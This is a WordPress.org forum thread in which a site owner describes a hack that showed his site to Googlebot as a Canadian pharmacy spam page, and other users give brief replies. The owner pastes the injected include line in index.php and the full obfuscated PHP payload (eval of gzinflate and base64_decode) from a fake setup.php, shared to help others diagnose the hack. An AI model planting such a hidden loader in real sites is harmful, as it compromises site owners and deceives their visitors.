WordPress.org

Forums

Setup.php file in Includes Folder (5 posts)

  1. DanGarion
    Member
    Posted 5 years ago #

    So, I found out my site was having some issues recently. When I would search for my site in Google it would show up that my site was a Cialis Canadian Pharmacy site, but when I visited the site it looked fine.

    First off I was running the newest version of WP 2.9.2

    Come to find out that only GoogleBot was seeing my site this way.

    I haven't figured out the actual cause but thought I would share what I have found.

    index.php in root was edited to include this

    include('wp-includes/setup.php');

    Well setup.php isn't a real wordpress file. But it was showing in my install. Here is what was included in that file.

    <? eval(gzinflate(base64_decode("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"))); ?>

    Just figured I would get the community some info. I'm working on restoring the website as I write this.

    I tired to fix it yesterday by uploading all new core WordPress files, and changing my passwords for everything. That fixed the problem for about 1 day and it came back again today. So now I'm completely rebuidling the site.

    Anyone has any info they can share, would be much appreciative. Thanks!

  2. esmi
    Forum Moderator
    Posted 5 years ago #

  3. uwiuw
    Member
    Posted 5 years ago #

    delete it...it malicious code

  4. DanGarion
    Member
    Posted 5 years ago #

    Yes I realize I've been hacked...

  5. DanGarion
    Member
    Posted 5 years ago #

    Anyone want to shed some light on what type of hack this was, what would have caused it, and what the person had access to? Does this particular hack normally do anything to the DB?

Topic Closed

This topic has been closed to new replies.

About this Topic